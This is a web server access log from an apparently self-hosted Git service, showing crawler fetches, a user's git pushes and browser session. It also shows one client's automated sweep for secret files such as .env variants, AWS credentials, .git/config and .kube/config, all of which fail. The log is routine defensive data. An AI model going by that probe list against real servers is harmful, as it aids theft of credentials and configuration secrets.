"/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" [Client 216.73.216.188] [Length 9883] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64?display=source" [Client 216.73.216.188] [Length 11027] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 11462] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 15574] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10911] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" [Client 216.73.216.188] [Length 11911] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate?display=source" [Client 216.73.216.188] [Length 12982] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fassets%2Fjs%2Fi18n.js" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs?display=rendered" [Client 216.73.216.188] [Length 11009] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 216.73.216.188] [Length 387797] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/7e5f452449b5385fa46a3a589ed6aac00a02734a.tar.gz" [Client 216.73.216.188] [Length 25535860] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.zip" [Client 216.73.216.188] [Length 25552511] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:12:50 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:10:12:51 +0000] - 401 401 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 13] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:10:13:03 +0000] - 401 401 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 13] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:10:13:18 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:10:13:18 +0000] - 401 401 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 13] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:10:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 235] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:10:13:27 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:10:13:28 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:10:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 195.178.110.160] [Length 5676] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 195.178.110.160] [Length 88935] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:35 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/_profiler/phpinfo" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:35 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.env" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:36 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.env.local" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:36 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.env.production" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:37 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/blog.env" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:38 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/wp-content/.env" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:38 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.git/config" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:38 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/application/.env" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:39 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/app/.env" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:39 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/config/.env" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:40 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/api/.env" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:40 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/config.json" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:40 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/laravel/.env" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:41 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/library/.env" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:42 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/nextjs-app/.env" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:42 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/node-api/.env" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:43 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/vendor/.env" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:43 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.aws/credentials" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:44 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/myproject/.env" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:45 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.envs/.production/.django" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:45 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/react-app/.env" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:46 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/react-app/.env.production" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:46 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/backend/.env" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:46 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/docker-compose.yml" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/credentials" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.aws/config" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/config.php" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/actuator/env" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.kube/config" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:19:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/config.yml" [Client 195.178.110.160] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[15/Feb/2026:10:30:43 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:10:30:43 +0000] - 401 401 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 13] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:10:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 235] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:10:30:52 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:10:31:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11614] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 3036] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 4595] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 5100] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:13 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:13 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/eventsource.sharedworker.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:13 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[15/Feb/2026:10:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20222] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[15/Feb/2026:10:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 222.117.41.51] [Length 17430] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html" [Client 222.117.41.51] [Length 21742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?only_content=true" [Client 222.117.41.51] [Length 27512] [Gzip 10.79] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[15/Feb/2026:10:50:12 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 216.73.216.188] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:50:12 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 12449] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static" [Client 216.73.216.188] [Length 10666] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 11606] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets/css" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets/css" -[15/Feb/2026:10:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 12336] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 216.73.216.188] [Length 11676] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" [Client 216.73.216.188] [Length 10500] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Properties" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Properties" -[15/Feb/2026:10:51:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 13511] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 14277] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/css/style.css" [Client 216.73.216.188] [Length 13336] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; 